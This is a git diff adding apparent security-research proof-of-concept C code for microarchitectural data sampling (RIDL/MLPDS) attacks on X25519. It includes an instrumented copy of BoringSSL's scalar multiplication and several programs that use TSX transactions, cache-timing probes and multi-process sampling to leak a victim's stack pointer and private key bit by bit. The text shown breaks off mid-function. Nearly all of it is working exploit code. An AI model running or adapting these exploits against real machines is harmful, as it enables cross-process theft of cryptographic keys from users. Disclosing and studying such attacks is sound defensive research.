(x2, z2) + // to_xz ((r+1)*P) === if swap then (x2, z2) else (x3, z3) + // x1 is the nonzero x coordinate of the nonzero point (r*P-(r+1)*P) + unsigned b = 1 & (e[pos / 8] >> (pos & 7)); + swap ^= b; + fe_cswap(&x2, &x3, swap); + fe_cswap(&z2, &z3, swap); + swap = b; + // Coq transcription of ladderstep formula (called from transcribed loop): + // + // + // x1 != 0 + // x1 = 0 + fe_sub(&tmp0l, &x3, &z3); + fe_sub(&tmp1l, &x2, &z2); + fe_add(&x2l, &x2, &z2); + fe_add(&z2l, &x3, &z3); + fe_mul_tll(&z3, &tmp0l, &x2l); + fe_mul_tll(&z2, &z2l, &tmp1l); + fe_sq_tl(&tmp0, &tmp1l); + fe_sq_tl(&tmp1, &x2l); + fe_add(&x3l, &z3, &z2); + fe_sub(&z2l, &z3, &z2); + fe_mul_ttt(&x2, &tmp1, &tmp0); + fe_sub(&tmp1l, &tmp1, &tmp0); + fe_sq_tl(&z2, &z2l); + fe_mul121666(&z3, &tmp1l); + fe_sq_tl(&x3, &x3l); + fe_add(&tmp0l, &tmp0, &z3); + fe_mul_ttt(&z3, &x1, &z2); + fe_mul_tll(&z2, &tmp1l, &tmp0l); + } + // here pos=-1, so r=e, so to_xz (e*P) === if swap then (x3, z3) else (x2, z2) + fe_cswap(&x2, &x3, swap); + fe_cswap(&z2, &z3, swap); + fe_invert(&z2, &z2); + fe_mul_ttt(&x2, &x2, &z2); + fe_tobytes(out, &x2); +} +static void x25519_scalar_mult(uint8_t out[32], const uint8_t scalar[32], + const uint8_t point[32]) { +#if defined(BORINGSSL_X25519_NEON) + if (CRYPTO_is_NEON_capable()) { + x25519_NEON(out, scalar, point); + return; + } +#endif + x25519_scalar_mult_generic(out, scalar, point); +} +void X25519_public_from_private(uint8_t out_public_value[32], + const uint8_t private_key[32]) { +#if defined(BORINGSSL_X25519_NEON) + if (CRYPTO_is_NEON_capable()) { + static const uint8_t kMongomeryBasePoint[32] = {9}; + x25519_NEON(out_public_value, private_key, kMongomeryBasePoint); + return; + } +#endif + uint8_t e[32]; + OPENSSL_memcpy(e, private_key, 32); + e[0] &= 248; + e[31] &= 127; + e[31] |= 64; + ge_p3 A; + x25519_ge_scalarmult_base(&A, e); + // We only need the u-coordinate of the curve25519 point. The map is + // u=(y+1)/(1-y). Since y=Y/Z, this gives u=(Z+Y)/(Z-Y). + fe_loose zplusy, zminusy; + fe zminusy_inv; + fe_add(&zplusy, &A.Z, &A.Y); + fe_sub(&zminusy, &A.Z, &A.Y); + fe_loose_invert(&zminusy_inv, &zminusy); + fe_mul_tlt(&zminusy_inv, &zplusy, &zminusy_inv); + fe_tobytes(out_public_value, &zminusy_inv); +} + +void X25519_fake(uint8_t out[32], + const uint8_t scalar[32], + const uint8_t point[32], + int iteration) { + fe x1, x2, z2, x3, z3, tmp0, tmp1; + fe_loose x2l, z2l, x3l, tmp0l, tmp1l; + + uint8_t e[32]; + OPENSSL_memcpy(e, scalar, 32); + e[0] &= 248; + e[31] &= 127; + e[31] |= 64; + + // The following implementation was transcribed to Coq and proven to + // correspond to unary scalar multiplication in affine coordinates given that + // x1 != 0 is the x coordinate of some point on the curve. It was also checked + // in Coq that doing a ladderstep with x1 = x3 = 0 gives z2' = z3' = 0, and z2 + // = z3 = 0 gives z2' = z3' = 0. The statement was quantified over the + // underlying field, so it applies to Curve25519 itself and the quadratic + // twist of Curve25519. It was not proven in Coq that prime-field arithmetic + // correctly simulates extension-field arithmetic on prime-field values. + // The decoding of the byte array representation of e was not considered. + // Specification of Montgomery curves in affine coordinates: + // + // Proof that these form a group that is isomorphic to a Weierstrass curve: + // + // Coq transcription and correctness proof of the loop (where scalarbits=255): + // + // + // preconditions: 0 <= e < 2^255 (not necessarily e < order), fe_invert(0) = 0 + fe_frombytes(&x1, point); + fe_1(&x2); + fe_0(&z2); + fe_copy(&x3, &x1); + fe_1(&z3); + + unsigned swap = 0; + int pos; + for (pos = 254; pos >= 0; --pos) { + // loop invariant as of right before the test, for the case where x1 != 0: + // pos >= -1; if z2 = 0 then x2 is nonzero; if z3 = 0 then x3 is nonzero + // let r := e >> (pos+1) in the following equalities of projective points: + // to_xz (r*P) === if swap then (x3, z3) else (x2, z2) + // to_xz ((r+1)*P) === if swap then (x2, z2) else (x3, z3) + // x1 is the nonzero x coordinate of the nonzero point (r*P-(r+1)*P) + unsigned b = 1 & (e[pos / 8] >> (pos & 7)); + swap ^= b; + fe_cswap(&x2, &x3, swap); + fe_cswap(&z2, &z3, swap); + swap = b; + // Coq transcription of ladderstep formula (called from transcribed loop): + // + // + // x1 != 0 + // x1 = 0 + fe_sub(&tmp0l, &x3, &z3); + fe_sub(&tmp1l, &x2, &z2); + fe_add(&x2l, &x2, &z2); + fe_add(&z2l, &x3, &z3); + fe_mul_tll(&z3, &tmp0l, &x2l); + fe_mul_tll(&z2, &z2l, &tmp1l); + fe_sq_tl(&tmp0, &tmp1l); + fe_sq_tl(&tmp1, &x2l); + fe_add(&x3l, &z3, &z2); + fe_sub(&z2l, &z3, &z2); + fe_mul_ttt(&x2, &tmp1, &tmp0); + fe_sub(&tmp1l, &tmp1, &tmp0); + fe_sq_tl(&z2, &z2l); + fe_mul121666(&z3, &tmp1l); + fe_sq_tl(&x3, &x3l); + fe_add(&tmp0l, &tmp0, &z3); + fe_mul_ttt(&z3, &x1, &z2); + if (pos == iteration) { + memcpy(out, &z3, 40); + return; + } + fe_mul_tll(&z2, &tmp1l, &tmp0l); + } + // here pos=-1, so r=e, so to_xz (e*P) === if swap then (x3, z3) else (x2, z2) + fe_cswap(&x2, &x3, swap); + fe_cswap(&z2, &z3, swap); + + fe_invert(&z2, &z2); + fe_mul_ttt(&x2, &x2, &z2); + fe_tobytes(out, &x2); +} diff --git a/pocs/cpus/mds-x25519/leak_evict_x25519.c b/pocs/cpus/mds-x25519/leak_evict_x25519.c new file mode 100644 index 00000000..414aba5e --- /dev/null +++ b/pocs/cpus/mds-x25519/leak_evict_x25519.c @@ -0,0 +1,464 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + + +#define MEMSZ (256*512 * 100) + +#ifndef EVICT +#define EVICT 24 +#endif + +#define CACHE_MISS 150 + +static inline __attribute__((always_inline)) int is_cached(void *ptr1) { + uint32_t diff; + asm volatile ( + //"CPUID\n\t" + "mfence\n\t" + "RDTSCP\n\t" + "mov rdx, [%1]\n\t" + "mov rbx, rax\n\t" + "RDTSCP\n\t" + "sub rax, rbx\n\t" + "mov %0, eax\n\t" + //"mfence\n\t" + + : "=b" (diff) + : "b"(ptr1) + : "rax", "rcx", "rdx"); + + return diff < CACHE_MISS; +} + +const unsigned long probe1_addr = 0x780000000; +char *probe1 = (char*) probe1_addr; +const unsigned long probe3_addr = 0x560000000; +char *probe3 = (char*) probe3_addr; +const unsigned long evict_addr = 0x340000000; +char *evict = (char*) evict_addr; + + +// Offset up to 4096 - be aware of boundaries on cache lines though! +static int ridl_confirm(unsigned long off, unsigned long prefix, size_t mask, unsigned int rol) { + if ((off & 0x3f) > 0x38) { + printf("\n\nERROR\n"); + printf("Trying RIDL on cross-cacheline offset!\n\n"); + exit(1); + } + _mm_clflush(probe1); + _mm_mfence(); + + // Evict target cache line - code works without it, but much worse. + volatile int sum = 0; + for (int i = 0; i < EVICT; i++) { + sum += ((volatile char*)evict_addr)[i*4096+(off&4095)]; + } + asm volatile( + "mov ecx, %4\n\t" + //"mov r15, 16\n\t" + "mov r14, %2\n" + ".align 64\n\t" + "0:\n\t" + "clflush [%0]\n\t" + "sfence\n\t" + // idk why, helps speed up + "clflush [%0 + 256]\n\t" + "xbegin 2f\n\t" + + //xbegin block: + "mov rax, [%0]\n\t" + "xor rax, %1\n\t" + "and rax, %3\n\t" + "rol rax, cl\n\t" // Doesn't matter too much, [10:50] + "prefetchnta [rax+r14]\n" + + "xend\n\t" + "2:\n\t" + //"dec r15\n\t" + //"jne 0b\n\t" + : + : "r" (probe3+(off&0x3f)), "r"(prefix), "r"(probe1), "r"(mask), "r"(rol) + : "rbx", "rax", "rcx", "rdx", "r15", "r14"); + + if (is_cached(probe1)) { return 0; } + return -1; +} + + +void map() { + if (mmap(probe1, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe1) { + err(1, "mmap(probe1)"); + } + memset(probe1, 0x99, 4096); + if (mmap(probe3, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe3) { + err(1, "mmap(probe3)"); + } + memset(probe3, 0x99, 4096); + if (mmap(evict, 4096*4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != evict) { + err(1, "mmap(evict)"); + } + memset(evict, 0x99, 4096*4096); +} + +void print_secret(unsigned char* secret, int up_to) { + printf("Secret:"); + for (int i = 0; i <= up_to; i++) { + printf(" %02x", secret[i]); + } + for (int i = up_to + 1; i < 32; i++) { + printf(" ??"); + } + printf("\n"); +} + +typedef struct pair {unsigned short i; unsigned short cnt;} pair; + +int cmp(const void* a, const void* b) { + const pair* pa = a; + const pair* pb = b; + if (pa->cnt > pb->cnt) return -1; + if (pa->cnt < pb->cnt) return 1; + return 0; +} + +void print_results(unsigned short *results) { + pair pairs[256]; + for (int i = 0; i < 256; i++) { + pairs[i].i = i; + pairs[i].cnt = results[i]; + } + qsort(pairs, 256, sizeof(*pairs), cmp); + int nonzero = 0; + for (size_t c = 0; c < 256; ++c) { + if (pairs[c].cnt > 0) { + nonzero++; + } + } + const int TOPN = 25; + for (size_t c = 0; c < TOPN; ++c) { + if (pairs[c].cnt > 0) { + printf("%05u: %02x\n", pairs[c].cnt, (unsigned int)pairs[c].i); + } + } + if (nonzero > TOPN) { + printf("[%d small skipped]\n", nonzero - TOPN); + } +} + +void print_results3(unsigned short* results) { + pair pairs[512]; + for (int i = 0; i < 512; i++) { + pairs[i].i = i; + pairs[i].cnt = results[i]; + } + qsort(pairs, 512, sizeof(*pairs), cmp); + int nonzero = 0; + for (size_t c = 0; c < 512; ++c) { + if (pairs[c].cnt > 0) { + nonzero++; + } + } + const int TOPN = 25; + for (size_t c = 0; c < TOPN; ++c) { + if (pairs[c].cnt > 0) { + printf("%05u: %03x\n", pairs[c].cnt, (unsigned int)pairs[c].i<<3); + } + } + if (nonzero > TOPN) { + printf("[%d small skipped]\n", nonzero - TOPN); + } +} + +int get_best(unsigned short *results) { + ssize_t best_cnt = -1e9; + int best_ind = 0; + for (int i = 0; i < 256; i++) { + if (results[i] > best_cnt) { + best_cnt = results[i]; + best_ind = i; + } + } + return best_ind; +} + +#define BITS_AT_A_TIME 2 +ssize_t leak_and_move(size_t* prefix, size_t* mask, size_t mask_off, size_t off, int rol) { + *mask |= ((1ull << BITS_AT_A_TIME) - 1) << mask_off; + + unsigned short results[256] = {0}; + for (int i = 0; i < 1000000; i++) { + /*if (i == 2000000) { + int best = get_best(results); + if (results[best] < 20) { + printf("Weak signal...\n"); + return -1; + } + }*/ + if (i % 256 == 0) { + // Quick check. + int bestfor = get_best(results); + int is_ok = 1; + for (int j = 0; j < (1<> 48; + printf("\n\n"); + printf("Result: stack pointer = 0x%zx\n", saved_rbp); + if (((off + 0x36) & 0x3f) != (saved_rbp & 0x3f)) { + printf("ERROR: rbp not at expected offset, memory layout might have changed since exploit development.\n"); + exit(1); + } + return saved_rbp; +} + +int stage4(size_t best_guess, size_t secret_offset, unsigned char* secret); +void stage5(size_t secret_offset, unsigned char* secret); +void stage3(size_t secret_offset, size_t saved_rbp) { + printf("Step 3: Guess 5 bits of secret.\n"); + printf("Leaking at offset = 0x%zx, prefix = 0xXYZ0000\n", secret_offset - 2); + + size_t best_guess = 0; + unsigned char best_guess_byte = 0; + size_t best_score = 0; + +#define STAGE3_START 0 +#define STAGE3_END (1<<8) +//#define STAGE3_START 0xe80 +//#define STAGE3_END 0xe88 + static unsigned char potential_secrets[0x1000][32]; + int leaked_secrets = 0; + int scorecnt = 0; + size_t off = secret_offset-2; + size_t mask = 0x00ffFFF8; +#define REPS3 100000 + + unsigned short results[1<<9] = {0}; + int iter = 0; + while (1) { + printf("iter=%d\n", ++iter); + for (int i = 0; i < leaked_secrets; i++) { + print_secret(potential_secrets[i], 31); + } + for (size_t guess = STAGE3_START; guess < STAGE3_END; guess += 1<<3) { + if (guess == 0) continue; + if (results[guess>>3] >= 0xfffeu) continue; + for (int times = 0; times < REPS3; times++) { + size_t prefix = (guess << 16) | 0x8; // This 0x8 is guessed... + int byte = ridl_confirm(off, prefix, mask, 23); + if (byte != -1 && results[guess>>3] < 0xfffeu) { + results[guess>>3]++; + } + } + } + print_results3(results); + for (int i = 0; i < (1<<9); i++) { + if (results[i] < 10 || results[i] == 0xffffu) continue; + size_t guess = i << 3; + printf("Trying guess = %04x.\n", guess); + results[i] = 0xffff; + // One last check: does leaking from off + 0x140 we have similar leakage. + int normal = 0; + int fake = 0; + for (int k = 0; k < iter*10; k++) { + printf("Precheck: %d/%d...\n", k, iter*10); + for (int j = 0; j < REPS3; j++) { + size_t prefix = (guess << 16) | 0x8; + int byte = ridl_confirm(off, prefix, mask, 23); + if (byte != -1) { + normal++; + } + } + for (int j = 0; j < REPS3; j++) { + size_t prefix = (guess << 16) | 0x8; + int byte = ridl_confirm(off + 0x140, prefix, mask, 23); + if (byte != -1) { + fake++; + } + } + } + // Expecting normal~100, fake~0 + int ratio = (normal+10)*100/(fake+10); + printf("Preliminary check: normal %d; fake %d - ratio = %d\n", normal, fake, ratio); + + if (ratio < 300) { + printf("Ratio too weak, ignoring.\n"); + continue; + } + char* secret = potential_secrets[leaked_secrets & 0xfff]; + leaked_secrets++; + int rv = stage4(guess, secret_offset, secret); + if (rv == 0) { + leaked_secrets--; + continue; + } + stage5(secret_offset, secret); + // From the boringssl code: + // e[31] &= 127; + // e[31] |= 64; + if ((secret[31] & 128) != 0 || (secret[31] & 64) != 64) { + printf("We leaked something, but it doesn't match the key format.\n"); + leaked_secrets--; + continue; + } + } + } +} + +int stage4(size_t best_guess, size_t secret_offset, unsigned char* secret) { + printf("\nStage 4: Leak secret[:6].\n"); + + size_t mask = 0x0000ffFFF8; + size_t prefix = (best_guess << 16) | 0x8; // This 0x8 is guessed... + + memset(secret, 0, 32); + secret[0] = best_guess & 0xff; + secret[1] = best_guess >> 8; + + int rol = 32; + for (int ind = 1; ind < 6; ind++) { + if (rol > 0) { + rol -= 8; + } + size_t off = secret_offset - 2; + for (int nib_ind = 0; nib_ind < 8 / BITS_AT_A_TIME; nib_ind++) { + //if (ind == 1 && nib_ind < 4 / BITS_AT_A_TIME) { continue; } + printf("Leaking at offset = 0x%zx (%d:%d), prefix = 0x%zx, mask = 0x%zx\n", + off, ind, nib_ind, prefix, mask); + ssize_t best = leak_and_move(&prefix, &mask, 16+ind*8+nib_ind*BITS_AT_A_TIME, + off, rol); + if (best == -1) return 0; + secret[ind] |= best << (nib_ind * BITS_AT_A_TIME); + } + print_secret(secret, ind); + } + return 1; +} + +void stage5(size_t secret_offset, unsigned char* secret) { + printf("\nStage 5: Leak secret[6:].\n"); + + size_t prefix = 0; + for (int i = 0; i < 6; i++) { + prefix |= ((size_t)secret[i]) << (8*i+8); + } + + int rol = 56; + for (int ind = 6; ind < 32; ind++) { + size_t mask = 0x00ffFFFFffffFFFFull; + size_t off = secret_offset - 7 + ind; + for (int nib_ind = 0; nib_ind < 8 / BITS_AT_A_TIME; nib_ind++) { + printf("Leaking at offset = 0x%zx (%d:%d), prefix = 0x%zx, mask = 0x%zx\n", + off, ind, nib_ind, prefix, mask); + ssize_t best = leak_and_move(&prefix, &mask, 56 + nib_ind * BITS_AT_A_TIME, + off, 56); + if (best == -1) return; + secret[ind] |= best << (nib_ind * BITS_AT_A_TIME); + } + print_secret(secret, ind); + prefix >>= 8; + } +} + +void run() { + map(); + + size_t cache_line_offset = stage1(); + size_t saved_rbp = stage2(cache_line_offset); + size_t secret_offset = (saved_rbp + 0xa0) & 0xfffu; + printf("Secret offset = 0x%zx\n", secret_offset); + printf("\n\n"); + + // Stage 3 calls stage 4 and 5 + stage3(secret_offset, saved_rbp); +} + +int main() { + run(); + + return 0; +} + diff --git a/pocs/cpus/mds-x25519/leak_intermediate_x25519.c b/pocs/cpus/mds-x25519/leak_intermediate_x25519.c new file mode 100644 index 00000000..68e18317 --- /dev/null +++ b/pocs/cpus/mds-x25519/leak_intermediate_x25519.c @@ -0,0 +1,310 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + + +#define MEMSZ (256*512 * 100) + +#define CACHE_MISS 100 + +static inline __attribute__((always_inline)) int is_cached(void *ptr1) { + uint32_t diff; + asm volatile ( + //"cpuid\n\t" + "mfence\n\t" + "lfence\n\t" + "RDTSC\n\t" + "mov rbx, rax\n\t" + "mov rdx, [%1]\n\t" + "RDTSCP\n\t" + "lfence\n\t" + "sub rax, rbx\n\t" + "mov %0, eax\n\t" + + : "=b" (diff) + : "S"(ptr1) + : "rax", "rcx", "rdx"); + + return diff < CACHE_MISS; +} + +const unsigned long probe1_addr = 0x7895e4000; +char *probe1 = (char*) probe1_addr; +const unsigned long probe3_addr = 0x560000000; +char *probe3 = (char*) probe3_addr; + + +static int mlpds(unsigned long prefix) { + prefix ^= probe1_addr; + _mm_clflush(probe1); + _mm_mfence(); + _mm_sfence(); + _mm_lfence(); + asm volatile("CPUID"::: "eax","ebx","ecx","edx", "memory"); + + + // TODO find optimal number of iterations. + for (int i = 0; i < 32; i++) { + asm volatile( + ".align 64\n\t" + "0:\n\t" + "clflush [%0]\n\t" + "sfence\n\t" + // idk why, helps speed up + "xbegin 2f\n\t" + + //xbegin block: + "mov rax, [-1]\n\t" + "xor rax, %1\n\t" + "prefetchnta [rax]\n" + + "xend\n\t" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "3: jmp 3b\n" + "2:\n\t" + //"dec r15\n\t" + //"jne 0b\n\t" + : + : "r" (probe3), "r"(prefix) + : "rax"); + } + + int p1 = is_cached(probe1); + if (p1) { return 0; } + return -1; +} + + +void map() { + if (mmap(probe1, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe1) { + err(1, "mmap(probe1)"); + } + memset(probe1, 0x99, 4096); + if (mmap(probe3, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe3) { + err(1, "mmap(probe3)"); + } + memset(probe3, 0x99, 4096); +} + +void print_secret(unsigned char* secret) { + printf("Secret:"); + for (int i = 0; i < 32; i++) { + printf(" %02x", secret[i]); + } + printf("\n"); +} + +void set_bit(uint8_t* privkey, int bit, int to) { + if (bit < 0) return; + privkey[bit / 8] &= ~(1 << (bit & 7)); + privkey[bit / 8] |= to << (bit & 7); +} + +int X25519_fake(uint8_t* out, const uint8_t* privkey, + const uint8_t* peer_pubkey, int iteration); + +void X25519_public_from_private(uint8_t out_public_value[32], + const uint8_t private_key[32]); + +void stage3(size_t secret_offset, size_t saved_rbp) { + uint8_t pubkey[32]; + uint8_t client_privkey[32]; + printf("Input client private key:\n"); + for (int i = 0; i < 32; i++) { + unsigned int n; + scanf("%x", &n); + client_privkey[i] = n; + } + X25519_public_from_private(pubkey, client_privkey); + for (int i = 0; i < 32; i++) { + printf("%02x ", client_privkey[i]); + } + printf("\n"); + for (int i = 0; i < 32; i++) { + printf("%02x ", pubkey[i]); + } + printf("\n"); + uint8_t privkey[32] = {0}; + privkey[31] &= 127; + privkey[31] |= 64; + uint8_t out[40]; + // The algorithm starts at that iteration. + int start_iteration = 253; + + // Check if checkpoint available. + FILE* f = fopen("/tmp/checkpoint", "r"); + if (!f) { + printf("Starting from scratch.\n"); + } + else { + printf("Starting from checkpoint.\n"); + fscanf(f, "%d", &start_iteration); + for (int i = 0; i < 32; i++) { + unsigned int n; + fscanf(f, "%x", &n); + privkey[i] = n; + } + fclose(f); + } + + print_secret(privkey); + +#define MARGIN 3 + + // Ending on iteration 3, since bits 2, 1 and 0 are unset. + for (int iteration = start_iteration; iteration >= 3; iteration--) { + unsigned short results[4][5] = {0}; + size_t poss[4][5] = {}; + + // iteration - 2 if you want to look at two bits. + // iteration - 1 if you want to look at one bit. + int x_it = iteration - 1; + if (x_it < 0) x_it = 0; + + for (int which_qword = 0; which_qword < 5; which_qword++) { + set_bit(privkey, iteration, 0); + set_bit(privkey, iteration-1, 0); + X25519_fake(out, privkey, pubkey, x_it); + poss[0][which_qword] = ((size_t*)out)[which_qword]; + + set_bit(privkey, iteration, 0); + set_bit(privkey, iteration-1, 1); + X25519_fake(out, privkey, pubkey, x_it); + poss[1][which_qword] = ((size_t*)out)[which_qword]; + + set_bit(privkey, iteration, 1); + set_bit(privkey, iteration-1, 0); + X25519_fake(out, privkey, pubkey, x_it); + poss[2][which_qword] = ((size_t*)out)[which_qword]; + + set_bit(privkey, iteration, 1); + set_bit(privkey, iteration-1, 1); + X25519_fake(out, privkey, pubkey, x_it); + poss[3][which_qword] = ((size_t*)out)[which_qword]; + } + + printf("iter=%d\nTargets:\n", iteration); + for (int i = 0; i < 5; i++) { + for (int j = 0; j < 4; j++) { + printf("%016llx ", poss[j][i]); + } + printf("\n"); + } + int diff_abs; + int bit; + do { + for (int times = 0; times < 20000; times++) { + for (int k = 0; k < 4; k++) { + for (int wq = 0; wq < 5; wq++) { + int byte = mlpds(poss[k][wq]); + if (byte != -1) { + // Oddly enough, this printf is sometimes necessary... Otherwise exploit + // occasionally breaks. + //printf("res: %d\n", byte); + results[k][wq]++; + } + } + } + } + //diff = 0; + //int plus = 0; + //int minus = 0; + int sums[4] = {0}; + for (int wq = 0; wq < 5; wq++) { + for (int ij = 0; ij < 4; ij++) { + sums[ij] += results[ij][wq]; + } + //diff += results[0][wq] + results[1][wq] - results[2][wq] - results[3][wq]; + //plus += results[0][wq] + results[1][wq]; + //minus += results[2][wq] + results[3][wq]; + printf("%d %d | %d %d\n", results[0][wq], results[1][wq], results[2][wq], results[3][wq]); + } + +#if 1 + //version for iteration - 1 + int x0 = sums[0] + sums[1]; + int x1 = sums[2] + sums[3]; + diff_abs = x0 - x1; + if (diff_abs < 0) diff_abs = -diff_abs; + bit = x1 > x0; + printf("--- diff_abs %d (%d vs. %d, total %d)\n", diff_abs, x0, x1, x0+x1); +#else + //version for iteration - 2 + int top = -1, topind = -1, top2 = -1, top2ind = -1; + for (int ij = 0; ij < 4; ij++) { + if (sums[ij] > top) { + top2 = top; + top2ind = topind; + top = sums[ij]; + topind = ij; + } + else if (sums[ij] > top2) { + top2 = sums[ij]; + top2ind = ij; + } + } + diff_abs = top - top2; + bit = topind >= 2; + printf("--- diff_abs %d (top1 %d vs. top2 %d vs. total %d)\n", diff_abs, top, top2, sums[0]+sums[1]+sums[2]+sums[3]); +#endif + } while (diff_abs < MARGIN); + set_bit(privkey, iteration-1, 0); + set_bit(privkey, iteration, bit); + /* + if (diff < 0) { + set_bit(privkey, iteration, 1); + } + else { + set_bit(privkey, iteration, 0); + } + */ + print_secret(privkey); + } + privkey[0] &= 248; + print_secret(privkey); +} + +void run() { + map(); + + stage3(0, 0); +} + +int main() { + run(); + + return 0; +} + diff --git a/pocs/cpus/mds-x25519/leak_multiprocess.c b/pocs/cpus/mds-x25519/leak_multiprocess.c new file mode 100644 index 00000000..a216ea3c --- /dev/null +++ b/pocs/cpus/mds-x25519/leak_multiprocess.c @@ -0,0 +1,368 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + + + +#define MEMSZ (256*512 * 100) + +#define CACHE_MISS 100 + +static inline __attribute__((always_inline)) int is_cached(void *ptr1) { + uint32_t diff; + asm volatile ( + //"cpuid\n\t" + "mfence\n\t" + "lfence\n\t" + "RDTSC\n\t" + "mov rbx, rax\n\t" + "mov rdx, [%1]\n\t" + "RDTSCP\n\t" + "lfence\n\t" + "sub rax, rbx\n\t" + "mov %0, eax\n\t" + + : "=b" (diff) + : "S"(ptr1) + : "rax", "rcx", "rdx"); + + return diff < CACHE_MISS; +} + +const unsigned long probe1_addr = 0x7895e4000; +char *probe1 = (char*) probe1_addr; +const unsigned long probe3_addr = 0x560000000; +char *probe3 = (char*) probe3_addr; + + +static int mlpds(unsigned long prefix) { + prefix ^= probe1_addr; + _mm_clflush(probe1); + _mm_mfence(); + _mm_sfence(); + _mm_lfence(); + asm volatile("CPUID"::: "eax","ebx","ecx","edx", "memory"); + + + // TODO find optimal number of iterations. + for (int i = 0; i < 32; i++) { + asm volatile( + ".align 64\n\t" + "0:\n\t" + "clflush [%0]\n\t" + "sfence\n\t" + // idk why, helps speed up + "xbegin 2f\n\t" + + //xbegin block: + "mov rax, [-1]\n\t" + "xor rax, %1\n\t" + "prefetchnta [rax]\n" + + "xend\n\t" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "3: jmp 3b\n" + "2:\n\t" + //"dec r15\n\t" + //"jne 0b\n\t" + : + : "r" (probe3), "r"(prefix) + : "rax"); + } + + int p1 = is_cached(probe1); + if (p1) { return 0; } + return -1; +} + + +void map() { + if (mmap(probe1, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe1) { + err(1, "mmap(probe1)"); + } + memset(probe1, 0x99, 4096); + if (mmap(probe3, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe3) { + err(1, "mmap(probe3)"); + } + memset(probe3, 0x99, 4096); +} + +void print_secret(unsigned char* secret) { + printf("Secret:"); + for (int i = 0; i < 32; i++) { + printf(" %02x", secret[i]); + } + printf("\n"); +} + +void set_bit(uint8_t* privkey, int bit, int to) { + if (bit < 0) return; + privkey[bit / 8] &= ~(1 << (bit & 7)); + privkey[bit / 8] |= to << (bit & 7); +} + +int X25519_fake(uint8_t* out, const uint8_t* privkey, + const uint8_t* peer_pubkey, int iteration); + +void X25519_public_from_private(uint8_t out_public_value[32], + const uint8_t private_key[32]); + +#define MARGIN 3 +#define CPU_NUM 6 + +size_t poss[4][5]; + +void do_kill(int pid) { + kill(pid, SIGKILL); + waitpid(pid, NULL, 0); +} + +void run_child(void* shmem) { + map(); + unsigned short* results = (unsigned short*) shmem; + while (1) { + for (int k = 0; k < 4; k++) { + for (int wq = 0; wq < 5; wq++) { + int byte = mlpds(poss[k][wq]); + if (byte != -1) { + results[k * 5 + wq]++; + printf("[pid %d] res: %d for [%d][%d]\n", getpid(), byte, k, wq); + } + } + } + } +} + +int fork_children(int* pids, int* affin, void* shmem) { + int count = 0; + for (int i = 0; i < CPU_NUM; i++) { + int pid = fork(); + if (pid == -1) { + err(1, "could not fork"); + } + if (pid == 0) { + run_child(shmem); + } + pids[count] = pid; + affin[count] = i; + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(i, &set); + int error = sched_setaffinity(pid, sizeof(set), &set); + if (error) { + if (errno == EINVAL) { + do_kill(pid); + printf("Affinity %d does not work, killing temporary process.\n", i); + } + else { + printf("err %d\n", error); + err(1, "sched_setaffinity"); + } + } + else { + printf("Created new child, pid = %d, affinity = core %d\n", pid, i); + count++; + } + } + return count; +} + +int affinity_valid(int pid, int aff) { + cpu_set_t set; + if (sched_getaffinity(pid, sizeof(set), &set) < 0) { + err(1, "sched_getaffinity"); + } + return CPU_COUNT(&set) == 1 && CPU_ISSET(aff, &set); +} + +void do_iteration(int iteration, uint8_t* privkey, uint8_t* pubkey) { + uint8_t out[40]; + unsigned short results[4][5] = {0}; + + // iteration - 2 if you want to look at two bits. + // iteration - 1 if you want to look at one bit. + int x_it = iteration - 1; + if (x_it < 0) x_it = 0; + + for (int which_qword = 0; which_qword < 5; which_qword++) { + set_bit(privkey, iteration, 0); + set_bit(privkey, iteration-1, 0); + X25519_fake(out, 